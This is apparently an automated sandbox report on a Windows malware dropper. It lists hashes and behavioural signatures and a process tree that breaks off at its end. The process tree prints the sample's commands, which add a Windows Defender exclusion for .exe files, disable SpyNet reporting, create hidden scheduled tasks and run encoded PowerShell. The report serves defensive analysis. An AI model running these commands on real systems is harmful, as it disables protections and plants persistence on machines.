Analysis
-
max time kernel
170s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 06:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
b374f37c729ba81d8328173c325af442
-
SHA1
9392040af20e507482bb1b3b4249060107240610
-
SHA256
f4b26d3c7a28964d229a292471dcb8247a1112f19397c57755f5a25e49acd3c1
-
SHA512
15f29d2bb4b244aa33cd066d8900296e284153a1a683979f6a944004fe11443b42f1aa93f6d30a06aa12476a350c7210c25d1feef6aa927cfbcae07e890576fc
-
SSDEEP
196608:91OZI3K3nEkGjraBNvx3RdfjK7ZFwvrfzSEb/W:3ODEkGjraBNx3Rd7K7ZkWEb/W
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 115 4692 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeXzswOIF.exeUuEaWBB.exepid process 2404 Install.exe 1696 Install.exe 4220 XzswOIF.exe 3816 UuEaWBB.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeUuEaWBB.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation UuEaWBB.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4692 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
UuEaWBB.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json UuEaWBB.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
UuEaWBB.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini UuEaWBB.exe -
Drops file in System32 directory 27 IoCs
Processes:
UuEaWBB.exepowershell.exeXzswOIF.exeInstall.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UuEaWBB.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini XzswOIF.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 UuEaWBB.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UuEaWBB.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 UuEaWBB.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol XzswOIF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 UuEaWBB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 UuEaWBB.exe -
Drops file in Program Files directory 14 IoCs
Processes:
UuEaWBB.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UuEaWBB.exe File created C:\Program Files (x86)\zjyBtxSiMuSUC\PbaOlpn.dll UuEaWBB.exe File created C:\Program Files (x86)\bNrcflyMMmUn\azqzHjg.dll UuEaWBB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UuEaWBB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UuEaWBB.exe File created C:\Program Files (x86)\InaIvrjBgGxU2\bgHqXYFIAPtcv.dll UuEaWBB.exe File created C:\Program Files (x86)\pGMaoMOmU\gqYIPc.dll UuEaWBB.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UuEaWBB.exe File created C:\Program Files (x86)\InaIvrjBgGxU2\eyuRBEh.xml UuEaWBB.exe File created C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\xSwKdTD.xml UuEaWBB.exe File created C:\Program Files (x86)\zjyBtxSiMuSUC\IGhrHkk.xml UuEaWBB.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UuEaWBB.exe File created C:\Program Files (x86)\pGMaoMOmU\PNLEqsS.xml UuEaWBB.exe File created C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\wCPOnfC.dll UuEaWBB.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\GqChQHaYBumcgGPDT.job schtasks.exe File created C:\Windows\Tasks\bvffOywEAsomCrOclN.job schtasks.exe File created C:\Windows\Tasks\aClwDgKsxBQnbYjuF.job schtasks.exe File created C:\Windows\Tasks\yKRLlrVxZRCwfvY.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3112 schtasks.exe 2264 schtasks.exe 2012 schtasks.exe 3088 schtasks.exe 1744 schtasks.exe 2112 schtasks.exe 2704 schtasks.exe 1432 schtasks.exe 4824 schtasks.exe 4688 schtasks.exe 4660 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeUuEaWBB.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\NukeOnDelete = "0" UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\MaxCapacity = "15140" UuEaWBB.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000} UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket UuEaWBB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEUuEaWBB.exepid process 4400 powershell.EXE 4400 powershell.EXE 228 powershell.exe 228 powershell.exe 4664 powershell.exe 4664 powershell.exe 4260 powershell.EXE 4260 powershell.EXE 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe 3816 UuEaWBB.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 4400 powershell.EXE Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeDebugPrivilege 4260 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEXzswOIF.exepowershell.execmd.exedescription pid process target process PID 4352 wrote to memory of 2404 4352 file.exe Install.exe PID 4352 wrote to memory of 2404 4352 file.exe Install.exe PID 4352 wrote to memory of 2404 4352 file.exe Install.exe PID 2404 wrote to memory of 1696 2404 Install.exe Install.exe PID 2404 wrote to memory of 1696 2404 Install.exe Install.exe PID 2404 wrote to memory of 1696 2404 Install.exe Install.exe PID 1696 wrote to memory of 1468 1696 Install.exe forfiles.exe PID 1696 wrote to memory of 1468 1696 Install.exe forfiles.exe PID 1696 wrote to memory of 1468 1696 Install.exe forfiles.exe PID 1696 wrote to memory of 5116 1696 Install.exe forfiles.exe PID 1696 wrote to memory of 5116 1696 Install.exe forfiles.exe PID 1696 wrote to memory of 5116 1696 Install.exe forfiles.exe PID 1468 wrote to memory of 2612 1468 forfiles.exe cmd.exe PID 1468 wrote to memory of 2612 1468 forfiles.exe cmd.exe PID 1468 wrote to memory of 2612 1468 forfiles.exe cmd.exe PID 5116 wrote to memory of 2096 5116 forfiles.exe cmd.exe PID 5116 wrote to memory of 2096 5116 forfiles.exe cmd.exe PID 5116 wrote to memory of 2096 5116 forfiles.exe cmd.exe PID 2096 wrote to memory of 3376 2096 cmd.exe reg.exe PID 2096 wrote to memory of 3376 2096 cmd.exe reg.exe PID 2096 wrote to memory of 3376 2096 cmd.exe reg.exe PID 2612 wrote to memory of 4232 2612 cmd.exe reg.exe PID 2612 wrote to memory of 4232 2612 cmd.exe reg.exe PID 2612 wrote to memory of 4232 2612 cmd.exe reg.exe PID 2612 wrote to memory of 204 2612 cmd.exe reg.exe PID 2612 wrote to memory of 204 2612 cmd.exe reg.exe PID 2612 wrote to memory of 204 2612 cmd.exe reg.exe PID 2096 wrote to memory of 116 2096 cmd.exe reg.exe PID 2096 wrote to memory of 116 2096 cmd.exe reg.exe PID 2096 wrote to memory of 116 2096 cmd.exe reg.exe PID 1696 wrote to memory of 2704 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 2704 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 2704 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3164 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3164 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3164 1696 Install.exe schtasks.exe PID 4400 wrote to memory of 1580 4400 powershell.EXE gpupdate.exe PID 4400 wrote to memory of 1580 4400 powershell.EXE gpupdate.exe PID 1696 wrote to memory of 3956 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3956 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3956 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3112 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3112 1696 Install.exe schtasks.exe PID 1696 wrote to memory of 3112 1696 Install.exe schtasks.exe PID 4220 wrote to memory of 228 4220 XzswOIF.exe powershell.exe PID 4220 wrote to memory of 228 4220 XzswOIF.exe powershell.exe PID 4220 wrote to memory of 228 4220 XzswOIF.exe powershell.exe PID 228 wrote to memory of 2136 228 powershell.exe cmd.exe PID 228 wrote to memory of 2136 228 powershell.exe cmd.exe PID 228 wrote to memory of 2136 228 powershell.exe cmd.exe PID 2136 wrote to memory of 4760 2136 cmd.exe reg.exe PID 2136 wrote to memory of 4760 2136 cmd.exe reg.exe PID 2136 wrote to memory of 4760 2136 cmd.exe reg.exe PID 228 wrote to memory of 4568 228 powershell.exe reg.exe PID 228 wrote to memory of 4568 228 powershell.exe reg.exe PID 228 wrote to memory of 4568 228 powershell.exe reg.exe PID 228 wrote to memory of 3696 228 powershell.exe reg.exe PID 228 wrote to memory of 3696 228 powershell.exe reg.exe PID 228 wrote to memory of 3696 228 powershell.exe reg.exe PID 228 wrote to memory of 3508 228 powershell.exe reg.exe PID 228 wrote to memory of 3508 228 powershell.exe reg.exe PID 228 wrote to memory of 3508 228 powershell.exe reg.exe PID 228 wrote to memory of 3168 228 powershell.exe reg.exe PID 228 wrote to memory of 3168 228 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\7zSBD98.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\7zSC364.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4232
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:204
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3376
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcXzYbaby" /SC once /ST 05:57:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcXzYbaby"4⤵PID:3164
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcXzYbaby"4⤵PID:3956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvffOywEAsomCrOclN" /SC once /ST 07:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exe\" Bp /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1428
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3256
-
C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exeC:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exe Bp /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4220 -
